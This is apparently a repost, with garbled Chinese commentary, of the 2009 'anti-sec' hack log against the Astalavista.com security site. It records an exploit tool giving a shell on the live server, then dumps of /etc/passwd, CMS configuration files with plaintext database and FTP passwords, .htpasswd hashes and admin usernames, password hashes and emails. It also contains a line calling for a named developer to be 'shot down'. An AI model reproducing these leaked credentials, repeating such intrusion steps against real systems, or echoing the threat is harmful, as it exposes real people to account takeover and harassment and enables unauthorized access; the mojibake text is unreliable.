Astalavista±»õåõï¹ý³Ì
ÀïÃæÁ½¸öÁÁµã£¬Ò»ÊÇÔ¶³Ì»ñµÃapacheÓû§È¨ÏÞµÄshell£¬bannerÊÇLiteSpeed£¬¿´À´ÕâÍæÒâÓÐ0day£¬µ«ÊÇÓÖÔõôÊÇÓÃapacheÓû§Åܵģ¬ÔÀ´LiteSpeedÕⶫÎ÷ÊǺÍapache°óÒ»ÆðµÄ£¬´ó¸Å¿´ÁËϽéÉÜ£¬Ö÷Òª¹¦ÄÜÊÇanti-ddos£¬ÕⶫÎ÷òËÆ»¹ÓеãÒâ˼£¬»ØÍ·ÍæÍæ¡£¾ßÌåµÄ¿´Á´½Ó±ê¼Çhttp://www.litespeedtech.com/litespeed-web-server-features.html¡£# curl -I litespeedtech.com
HTTP/1.1 200 OK
Date: Fri, 05 Jun 2009 22:54:51 GMT
Server: LiteSpeed
ÁíÍâÒ»¸öÁÁµã¾ÍÊÇlocalrootÁË£¬Èç¹û²»ÊÇudevµÄ»°£¬ÄÇô¾ÍÊÇRHEL5.3x64»¹ÓÐÒ»¸ölocalroot 0day -_-
ÓÐÈË˵astalavista±»ºÚÊÇÒòΪYÄÃmilw0rmµÄ¶«Î÷׬Ǯ£¬Õâ¸öÎÒ¾õµÃ¾ÍÊÇÿ¸öÈ˵ij߶ÈÎÊÌ⣬ÓÐÈË»¹°Ñ±ðÈËдµÄÎÄÕÂŪ³É×Ô¼ºÐ´µÄ£¬»¹ÓÐÈ˰ѱðÈ˵ijÌÐò¸Ä³É×Ô¼ºµÄ£¬¶àÁËÈ¥ÁË¡£
/_\/ _____/\__ ___/_\ | | /_\ \ / /| |/ _____/\__ ___/_\
//_\\ \_____\ | | //_\\| | //_\\ Y / | |\_____\ | | //_\\
/ | \/ \| |/ | \ |___/ | \ /| |/ \| |/ | \
\____|__/_______/|____|\____|__/_______ \____|__/\___/ |___/_______/|____|\____|__/
\/ \/ \/ \/ \/ \/ \/
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
From < <b style=¡±color:black;background-color:#ffff66¡å>http</b>://<b style=¡±color:black;background-color:#ffff66¡å>astalavista</b>.<b style=¡±color:black;background-color:#ffff66¡å>com</b>/faq>:
>> 03. Who¡¯s behind the site?
>>
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
>>
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
military institutions.
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
Why has Astalavista been targeted?
Other than the fact that they are not doing any of this for the ¡°community¡± but
for the money, they spread exploits for kids, claim to be a security community
(with no real sense of security on their own servers), and they charge you $6.66
per months to access a dead forum with a directory filled with public releases
and outdated / broken services.
We wanted to see how good that ¡°team of security and IT professionals¡± really is.
Let¡¯s begin.
anti-sec:~# ./g0tshell astalavista.com -p 80
[+] Connecting to astalavista.com:80
[+] Grabbing banner¡
LiteSpeed
[+] Injecting shellcode¡
[-] Wait for it
[~] We g0tshell
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
ID: uid=100(apache) gid=500(apache) groups=500(apache)
sh-3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
jon:x:502:503::/home/jon:/bin/bash
com:x:503:504::/home/com:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
astanet:x:504:505::/home/astanet:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
sh-3.2$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
80.74.154.172 asta1.astalavistaserver.com
sh-3.2$ pwd
/home/com/public_html
sh-3.2$ ls -la
total 18460
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
drwx¨Cx¨Cx 11 com com 4096 Jun 252008 ..
drwxr-xr-x2 com com 4096 Feb2 19:29 admin
drwxrwxrwx2 com com 18591744 Jun4 08:04 cache
drwxr-xr-x6 com com 4096 Mar 28 21:17 cadmin
drwxrwxrwx2 com com 4096 May 19 00:50 config
drwxr-xr-x2 com com 4096 Mar 20 11:05 core
drwxr-xr-x 18 com com 4096 Feb2 19:29 core_modules
drwxr-xr-x4 com com 4096 Feb2 19:29 customizing
drwxr-xr-x2 com com 4096 May 11 13:24 customizing_paulo
drwxr-xr-x6 com com 4096 Mar 30 12:28 __DELETE__
-rw-r¨Cr¨C1 com com 8035 May 19 14:26 directory_to_mediadir.php
drwxr-xr-x2 com com 4096 Sep92008 dvd
drwxr-xr-x3 com com 4096 Feb2 19:29 editor
-rw-r¨Cr¨C1 com com 3750 Feb 27 16:12 favicon.ico
drwxrwxrwx2 com com 4096 Jun4 08:00 feed
-rwxrwxrwx1 com com 10736 May 29 12:44 .htaccess
-rw-r¨Cr¨C1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
-rw-r¨Cr¨C1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
drwxr-xr-x 18 com com 4096 Apr92008 ideapool
drwxrwxrwx 14 com com 4096 Feb2 19:29 images
-rw-r¨Cr¨C1 com com 97496 Jun2 13:01 index.php
drwxr-xr-x6 com com 4096 Feb2 19:29 installer
drwxr-xr-x8 com com 4096 Feb2 19:29 lang
drwxr-xr-x 22 com com 4096 Feb2 19:29 lib
drwxrwxrwx 12 com com 4096 Jun2 07:47 media
drwxr-xr-x8 com com 4096 May 11 12:48 modifications
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
drwxr-xr-x 26 com com 4096 Feb2 19:27 _old
drwxr-xr-x2 com com 4096 Mar 30 12:29 phproxy
drwxr-xr-x2 com com 4096 Mar 30 12:30 proxy
-rw-r¨Cr¨C1 com com 26 Feb2 19:33 robots.txt
-rwxrwxrwx1 com com 10844 Jun2 09:50 sitemap.xml
-rw-r¨Cr¨C1 com com 223 Mar 30 15:32 test.php
drwxrwxrwx8 com com 4096 Mar6 13:15 themes
drwxrwxrwx3 com com 4096 Jun4 08:00 tmp
drwxr-xr-x3 com com 4096 Feb2 19:33 webcam
sh-3.2$ head -20 index.php
<?php
/**
* The main page for the CMS
* @copyright CONTREXX CMS - COMVATION AG
* @author Comvation Development Team
* @version v1.0.9.10.1 stable
* @package contrexx
* @subpackage core
* @link Á´½Ó±ê¼Çhttp://www.contrexx.com/ contrexx homepage
* @since v0.0.0.0
* @todo Capitalize all class names in project
* @uses /config/configuration.php
* @uses /config/settings.php
* @uses /config/version.php
* @uses /core/API.php
* @uses /core_modules/cache/index.class.php
* @uses /core/error.class.php
* @uses /core_modules/banner/index.class.php
* @uses /core_modules/contact/index.class.php
sh-3.2$ cd config/
sh-3.2$ ls -la
total 32
drwxrwxrwx2 com com 4096 May 19 00:50 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rwxrwxrwx1 com com 2998 May 11 12:29 configuration.php
-rwxrwxrwx1 com com 7610 May 28 17:27 set_constants.php
-rwxrwxrwx1 com com 4186 May 25 12:54 settings.php
-rwxrwxrwx1 com com 672 Feb2 19:29 version.php
sh-3.2$ cat configuration.php
$_DBCONFIG['host'] = ¡®localhost¡¯; // This is normally set to localhost
$_DBCONFIG['database'] = ¡®com_contrexx2_live¡¯; // Database name
$_DBCONFIG['tablePrefix'] = ¡®contrexx_¡¯; // Database table prefix
$_DBCONFIG['user'] = ¡®contrexxuser2¡ä; // Database username
$_DBCONFIG['password'] = ¡®0fEYNZgXz1pKe¡¯; // Database password
$_DBCONFIG['dbType'] = ¡®mysql¡¯; // Database type (e.g. mysql,postgres ..)
$_DBCONFIG['charset'] = ¡®utf8¡ä; // Charset (default, latin1, utf8, ..)
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
$_FTPCONFIG['host'] = ¡®localhost¡¯;// This is normally set to localhost
$_FTPCONFIG['port'] = 21; // Ftp remote port
$_FTPCONFIG['username'] = ¡®Á´½Ó±ê¼Çdev@astalavista.com¡¯; // Ftp login username
$_FTPCONFIG['password'] = ¡®jajklop0Iuj¡¯; // Ftp login password
$_FTPCONFIG['path'] = ¡®/¡¯; // Ftp path to cms
sh-3.2$ cd ..
sh-3.2$ cd dvd/
sh-3.2$ ls -la
total 2913780
drwxr-xr-x2 com com 4096 Sep92008 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
-rw-r¨Cr¨C1 com com 1050061483 May 162008 astalavista_security_toolbox_dvd_2008.part1.rar
-rw-r¨Cr¨C1 com com 1050061483 May 162008 astalavista_security_toolbox_dvd_2008.part2.rar
-rw-r¨Cr¨C1 com com 880644069 May 162008 astalavista_security_toolbox_dvd_2008.part3.rar
-rw-r¨Cr¨C1 com com 115 Jan 292008 .htaccess
sh-3.2$ cat .htaccess
authType Basic
authName DVD
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
require valid-user
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
DVDdownload:CRD8cuY6.MPT6
DVDdownload2:CR8a36.wluFMg
sh-3.2$ cat test.php
<?php
$url = ¡®aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D¡¯;
$url = str_replace(array(¡¯&¡¯, ¡®&¡¯), ¡®&¡¯, base64_decode(rawurldecode($url)));
echo $url;
?>
sh-3.2$ cd modifications/
sh-3.2$ ls -la
total 32
drwxr-xr-x8 com com 4096 May 11 12:48 .
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
drwxr-xr-x3 com com 4096 Feb2 19:33 com_avtng
drwxr-xr-x3 com com 4096 May 12 09:26 cronjobs
drwxr-xr-x2 com com 4096 Mar2 10:35 onlinetools
drwxr-xr-x4 com com 4096 Feb2 19:33 pjirc
drwxr-xr-x2 com com 4096 Feb2 19:33 search
drwxr-xr-x2 com com 4096 Mar 25 08:56 _tmp
sh-3.2$ ls -R
.:
com_avtngcronjobsonlinetoolspjircsearch_tmp
./com_avtng:
avtng.phpbanner_bottom.inc.phpbanner_button.inc.phpbanner_content.inc.phpbanner_popunder.inc.phpbanner_right.inc.phpbanner_top.inc.phpiframe.phpscripts
./com_avtng/scripts:
popunder.js
./cronjobs:
exploits.phpexploits.shgoogle_blogindexing.phpip2country.shproxydb2.phpproxydb.phpsecuritynews.phptmp
./cronjobs/tmp:
contrexx_module_onlinetools_defaultports.csvcontrexx_module_onlinetools_geolitecity_country.csv
./onlinetools:
index.php
./pjirc:
a_big.jpg english.lng img irc.jar NormalApplet.htmlpixx-french.lngpjirc.cfg securedirc-unsigned.cabthanks.txt
AppletWithJS.htmlfrench.lng IRCApplet.classirc-unsigned.jarpixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
background.gif HeavyApplet.htmlirc.cab license.txt pixx-english.lng pixx-readme.txtsecuredirc.cabsnd
./pjirc/img:
ange.gif bombe.gif clin-oeuil.gif content.gifenerve2.gifgarcon.gif langue.gifmecontent.gifordi.gif portable.gif sapin.gif triste.gif
arbre.gif bouche.gifclin-oeuil-langue.gifcool.gif femme.gif grognon.gif lettre.gifnewbie.gif pere-noel.gifpouce-non.gifsleep.gif
verre-eau.gif
argh.gif bouqin.gifcoeur-brise.gif diable.gif fille.gif halloween.giflit.gif OH-1.gif pleure.gif pouce-oui.gifsoleil.gif
verre-vin.gif
ballon.gifcadeau.gifcoeur.gif dwchat.gif fleur.gif hamburger.giflove.gif OH-2.gif poisson.gif roll-eyes.gifsourire.gifyinyang.gif
biere.gif chien.gif comprends-pas.gif enerve1.giffume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
./pjirc/snd:
bell2.auding.au
./search:
searchEngines.phpsearch.php
./_tmp:
defaultPorts.phpdefaultPorts.txt
sh-3.2$ cd cronjobs/
sh-3.2$ cat exploits.php
$categories = array();
$milw0rmFile= FULLPATH . ¡®/modifications/cronjobs/tmp/milw0rm/sploitlist.txt¡¯;
$expolits = file($milw0rmFile);
$comExploits= array();
// manage data
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
// get path and title
$expolits[$x] = trim($expolits[$x]);
$path = str_replace(¡¯./¡¯, FULLPATH . ¡®/modifications/cronjobs/tmp/milw0rm/¡¯, substr($expolits[$x], 0, strpos($expolits[$x], ¡® ¡®)));
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ¡® ¡®) + 1, strlen($expolits[$x])), ENT_QUOTES);
// check if file exists
if (file_exists($path)) {
$text = file_get_contents($path);
// get content and date
//$text = htmlspecialchars($text, ENT_QUOTES);
$tmptext = addslashes(htmlentities($text,ENT_QUOTES, ¡°UTF-8¡å));
if ($tmptext != ¡±) {
$text = $tmptext;
} else {
$text = addslashes(htmlentities($text,ENT_QUOTES));
}
$date = str_replace(¡¯milw0rm.com [', '', str_replace(']¡®, ¡±, strstr($text, ¡®milw0rm.com [')));
$tmp= explode('-', $date);
$date = mktime(0, 0, 0, trim($tmp), trim($tmp), trim($tmp));
$cat= getCategory ($path);
$ext= pathinfo(basename($path));
$ext= $ext['extension'];
$qStr = ¡±
SELECT`id`
FROM `contrexx_module_exploits`
WHERE `title`=¡®¡± . $title . ¡°¡®
AND `date` =¡®¡± . $date . ¡°¡®
¡°;
echo $x + 1 . ¡® von ¡® . count($expolits) . ¡® -> ¡® . $qStr . ¡°\n¡±;
$q = $_objDB->query($qStr);
if ($q->numRows() == 0) {
// prepare array
$comExploits[$x]['date'] = $date;
$comExploits[$x]['title'] = $title;
$comExploits[$x]['author'] = ¡®milw0rm¡¯;
$comExploits[$x]['text'] = $text;
$comExploits[$x]['source'] = $ext;
$comExploits[$x]['url1'] = ¡±;
$comExploits[$x]['url2'] = ¡±;
$comExploits[$x]['catid'] = $cat;
$comExploits[$x]['lang'] = ¡®2¡ä;
$comExploits[$x]['userid'] = ¡®12¡ä;
$comExploits[$x]['startdate'] = ¡®0000-00-00¡ä;
$comExploits[$x]['enddate'] = ¡®0000-00-00¡ä;
$comExploits[$x]['status'] = ¡®1¡ä;
$comExploits[$x]['changelog'] = $date;
}
$xml = ¡®<?xml version=¡±1.0¡å encoding=¡±UTF-8¡å?>
<rss version=¡±2.0¡å>
<channel>
<title>ASTALAVISTA.com - Exploits</title>
<link>http://www.astalavista.com/exploits</link>
<description>All availably Exploits.</description>
<language>en-us</language>
<lastBuildDate>¡¯ . date(¡¯F, j M Y H:i:s O¡¯) . ¡®</lastBuildDate>
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
<generator>Astalavista.com</generator>
<webMaster>info@astalavista.com</webMaster>¡¯ . $items . ¡®
</channel>
</rss>¡¯;
if (file_exists(FULLPATH . ¡®/feed/exploits.xml¡¯)) {
unlink (FULLPATH . ¡®/feed/exploits.xml¡¯);
}
file_put_contents(FULLPATH . ¡®/feed/exploits.xml¡¯, $xml);
sh-3.2$ cat exploits.sh
#!/bin/sh
###########################################################
# #
# Title: milw0rm exploits adder #
# Description:Add all milw0rm exploits to the #
# Astalavista.com database #
# #
# Company: Astalavista Group #
# Author: Paulo M. Santos #
# E-Mail: Á´½Ó±ê¼Çpaulo.santos@astalavista.ch #
# #
###########################################################
# path
this_path=/home/com/public_html/modifications/cronjobs
# change directory
cd $this_path
cd tmp/
# delete files
rm -rf milw0rm.tar.* &
rm -rf milw0rm/ &
# wget milw0rm paket
wget Á´½Ó±ê¼Çhttp://www.milw0rm.com/sploits/milw0rm.tar.bz2
# extract milw0rm paket
tar -xvf milw0rm.tar.bz2
# change owner
chown -R com .
chgrp -R com .
# execute php script
cd $this_path
php -q exploits.php
# delete files
rm -rf tmp/milw0rm.tar.*
rm -rf tmp/milw0rm/
sh-3.2$ echo ¡°Paulo M. Santos needs to be shot down.¡±
Paulo M. Santos needs to be shot down.
mysql -u contrexxuser2 -p
Enter password:
Welcome to the MySQL monitor.Commands end with ; or \g.
Your MySQL connection id is 261694
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
Type ¡®help;¡¯ or ¡®\h¡¯ for help. Type ¡®\c¡¯ to clear the buffer.
mysql> show databases;
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Database |
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| information_schema |
| com_contrexx2 |
| com_contrexx2_live |
| test |
+¡ª¡ª¡ª¡ª¡ª¡ª¨C+
4 rows in set (0.00 sec)
mysql> use com_contrexx2_live
Database changed
mysql> show tables;
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| Tables_in_com_contrexx2_live |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| cc_banner_counter |
| cc_search_counter |
| contrexx_access_group_dynamic_ids |
| contrexx_access_group_static_ids |
| contrexx_access_rel_user_group |
| contrexx_access_settings |
| contrexx_access_user_attribute |
| contrexx_access_user_attribute_name |
| contrexx_access_user_attribute_value |
| contrexx_access_user_core_attribute |
| contrexx_access_user_groups |
| contrexx_access_user_mail |
| contrexx_access_user_profile |
| contrexx_access_user_title |
| contrexx_access_user_validity |
| contrexx_access_users |
| contrexx_backend_areas |
| contrexx_backups |
| contrexx_content |
| contrexx_content_history |
| contrexx_content_logfile |
| contrexx_content_navigation |
| contrexx_content_navigation_history |
| contrexx_ids |
| contrexx_languages |
| contrexx_lib_country |
| contrexx_log |
| contrexx_module_alias_source |
| contrexx_module_alias_target |
| contrexx_module_block_blocks |
| contrexx_module_block_rel_lang |
| contrexx_module_block_rel_pages |
| contrexx_module_block_settings |
| contrexx_module_blog_categories |
| contrexx_module_blog_comments |
| contrexx_module_blog_message_to_category |
| contrexx_module_blog_messages |
| contrexx_module_blog_messages_lang |
| contrexx_module_blog_networks |
| contrexx_module_blog_networks_lang |
| contrexx_module_blog_settings |
| contrexx_module_blog_votes |
| contrexx_module_calendar |
| contrexx_module_calendar_access |
| contrexx_module_calendar_categories |
| contrexx_module_calendar_form_data |
| contrexx_module_calendar_form_fields |
| contrexx_module_calendar_registrations |
| contrexx_module_calendar_settings |
| contrexx_module_calendar_style |
| contrexx_module_contact_form |
| contrexx_module_contact_form_data |
| contrexx_module_contact_form_field |
| contrexx_module_contact_settings |
| contrexx_module_data_categories |
| contrexx_module_data_message_to_category |
| contrexx_module_data_messages |
| contrexx_module_data_messages_lang |
| contrexx_module_data_placeholders |
| contrexx_module_data_settings |
| contrexx_module_directory_access |
| contrexx_module_directory_categories |
| contrexx_module_directory_dir |
| contrexx_module_directory_inputfields |
| contrexx_module_directory_levels |
| contrexx_module_directory_mail |
| contrexx_module_directory_rel_dir_cat |
| contrexx_module_directory_rel_dir_level |
| contrexx_module_directory_settings |
| contrexx_module_directory_settings_google |
| contrexx_module_directory_vote |
| contrexx_module_docsys |
| contrexx_module_docsys_categories |
| contrexx_module_egov_configuration |
| contrexx_module_egov_orders |
| contrexx_module_egov_product_calendar |
| contrexx_module_egov_product_fields |
| contrexx_module_egov_products |
| contrexx_module_egov_settings |
| contrexx_module_exploits |
| contrexx_module_exploits_categories |
| contrexx_module_feed_category |
| contrexx_module_feed_news |
| contrexx_module_feed_newsml_association |
| contrexx_module_feed_newsml_categories |
| contrexx_module_feed_newsml_documents |
| contrexx_module_feed_newsml_providers |
| contrexx_module_forum_access |
| contrexx_module_forum_categories |
| contrexx_module_forum_categories_lang |
| contrexx_module_forum_notification |
| contrexx_module_forum_postings |
| contrexx_module_forum_rating |
| contrexx_module_forum_settings |
| contrexx_module_forum_statistics |
| contrexx_module_gallery_categories |
| contrexx_module_gallery_comments |
| contrexx_module_gallery_language |
| contrexx_module_gallery_language_pics |
| contrexx_module_gallery_pictures |
| contrexx_module_gallery_settings |
| contrexx_module_gallery_votes |
| contrexx_module_guestbook |
| contrexx_module_guestbook_settings |
| contrexx_module_livecam |
| contrexx_module_livecam_settings |
| contrexx_module_market |
| contrexx_module_market_access |
| contrexx_module_market_categories |
| contrexx_module_market_mail |
| contrexx_module_market_paypal |
| contrexx_module_market_settings |
| contrexx_module_market_spez_fields |
| contrexx_module_mediadir_access |
| contrexx_module_mediadir_categories |
| contrexx_module_mediadir_comments |
| contrexx_module_mediadir_dir |
| contrexx_module_mediadir_inputfields |
| contrexx_module_mediadir_levels |
| contrexx_module_mediadir_mail |
| contrexx_module_mediadir_rel_dir_cat |
| contrexx_module_mediadir_rel_dir_level |
| contrexx_module_mediadir_reports |
| contrexx_module_mediadir_settings |
| contrexx_module_mediadir_settings_google |
| contrexx_module_mediadir_vote |
| contrexx_module_memberdir_directories |
| contrexx_module_memberdir_name |
| contrexx_module_memberdir_settings |
| contrexx_module_memberdir_values |
| contrexx_module_nettools_allowed_groups |
| contrexx_module_nettools_settings |
| contrexx_module_news |
| contrexx_module_news_access |
| contrexx_module_news_categories |
| contrexx_module_news_settings |
| contrexx_module_news_teaser_frame |
| contrexx_module_news_teaser_frame_templates |
| contrexx_module_news_ticker |
| contrexx_module_newsletter |
| contrexx_module_newsletter_attachment |
| contrexx_module_newsletter_category |
| contrexx_module_newsletter_confirm_mail |
| contrexx_module_newsletter_rel_cat_news |
| contrexx_module_newsletter_rel_user_cat |
| contrexx_module_newsletter_settings |
| contrexx_module_newsletter_template |
| contrexx_module_newsletter_tmp_sending |
| contrexx_module_newsletter_user |
| contrexx_module_newsletter_user_title |
| contrexx_module_onlinetools_defaultports |
| contrexx_module_onlinetools_defaultports_back |
| contrexx_module_onlinetools_geolitecity_blocks |
| contrexx_module_onlinetools_geolitecity_country|
| contrexx_module_onlinetools_geolitecity_location |
| contrexx_module_podcast_category |
| contrexx_module_podcast_medium |
| contrexx_module_podcast_rel_category_lang |
| contrexx_module_podcast_rel_medium_category |
| contrexx_module_podcast_settings |
| contrexx_module_podcast_template |
| contrexx_module_proxydb |
| contrexx_module_recommend |
| contrexx_module_repository |
| contrexx_module_securitynews_cats |
| contrexx_module_securitynews_feeds |
| contrexx_module_securitynews_news |
| contrexx_module_shop_categories |
| contrexx_module_shop_config |
| contrexx_module_shop_countries |
| contrexx_module_shop_currencies |
| contrexx_module_shop_customers |
| contrexx_module_shop_importimg |
| contrexx_module_shop_lsv |
| contrexx_module_shop_mail |
| contrexx_module_shop_mail_content |
| contrexx_module_shop_manufacturer |
| contrexx_module_shop_order_items |
| contrexx_module_shop_order_items_attributes |
| contrexx_module_shop_orders |
| contrexx_module_shop_payment |
| contrexx_module_shop_payment_processors |
| contrexx_module_shop_pricelists |
| contrexx_module_shop_products |
| contrexx_module_shop_products_attributes |
| contrexx_module_shop_products_attributes_name |
| contrexx_module_shop_products_attributes_value |
| contrexx_module_shop_products_downloads |
| contrexx_module_shop_rel_countries |
| contrexx_module_shop_rel_payment |
| contrexx_module_shop_rel_shipment |
| contrexx_module_shop_shipment_cost |
| contrexx_module_shop_shipper |
| contrexx_module_shop_vat |
| contrexx_module_shop_zones |
| contrexx_module_u2u_address_list |
| contrexx_module_u2u_message_log |
| contrexx_module_u2u_sent_messages |
| contrexx_module_u2u_settings |
| contrexx_module_u2u_user_log |
| contrexx_modules |
| contrexx_sessions |
| contrexx_settings |
| contrexx_settings_smtp |
| contrexx_skins |
| contrexx_stats_browser |
| contrexx_stats_colourdepth |
| contrexx_stats_config |
| contrexx_stats_country |
| contrexx_stats_hostname |
| contrexx_stats_javascript |
| contrexx_stats_operatingsystem |
| contrexx_stats_referer |
| contrexx_stats_requests |
| contrexx_stats_requests_summary |
| contrexx_stats_screenresolution |
| contrexx_stats_search |
| contrexx_stats_spiders |
| contrexx_stats_spiders_summary |
| contrexx_stats_visitors |
| contrexx_stats_visitors_summary |
| contrexx_voting_additionaldata |
| contrexx_voting_email |
| contrexx_voting_rel_email_system |
| contrexx_voting_results |
| contrexx_voting_system |
| foo |
+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
227 rows in set (0.01 sec)
mysql> select count(*) as skids from contrexx_access_users;
+¡ª¡ª-+
| skids |
+¡ª¡ª-+
| 53699 |
+¡ª¡ª-+
1 row in set (0.00 sec)
mysql> describe contrexx_access_users;
+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª-+
| Field | Type | Null | Key | Default | Extra |
+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª-+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| is_admin | tinyint(1) unsigned | NO | | 0 | |
| username | varchar(40) | YES| MUL | NULL | |
| password | varchar(32) | YES| | NULL | |
| regdate | int(14) unsigned | NO | | 0 | |
| expiration | int(14) unsigned | NO | | 0 | |
| validity | int(10) unsigned | NO | | 0 | |
| last_auth | int(14) unsigned | NO | | 0 | |
| last_activity | int(14) unsigned | NO | | 0 | |
| email | varchar(255) | YES| | NULL | |
| email_access | enum(¡¯everyone¡¯,'members_only¡¯,'nobody¡¯) | NO | | nobody | |
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
| backend_lang_id| int(2) unsigned | NO | | 0 | |
| active | tinyint(1) | NO | | 0 | |
| profile_access | enum(¡¯everyone¡¯,'members_only¡¯,'nobody¡¯) | NO | | members_only | |
| restore_key | varchar(32) | NO | | | |
| restore_key_time | int(14) unsigned | NO | | 0 | |
| u2u_active | enum(¡¯0¡ä,¡¯1¡ä) | NO | | 1 | |
+¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª+¡ª¡ª+¡ª¨C+¡ª¡ª¡ª¡ª¨C+¡ª¡ª¡ª¡ª¡ª-+
18 rows in set (0.00 sec)
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
+¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| username | password | email |
+¡ª¡ª¡ª¡ª+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-+¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¨C+
| system | 0defe9e458e745625fffbc215d7801c5 | Á´½Ó±ê¼Çinfo@comvation.com |
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | Á´½Ó±ê¼Çprozac@astalavista.com |
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | Á´½Ó±ê¼Çpaulo.santos@astalavista.ch |
| schmid | 0defe9e458e745625fffbc215d7801c5 | Á´½Ó±ê¼Çivan.schmid@comvation.com |
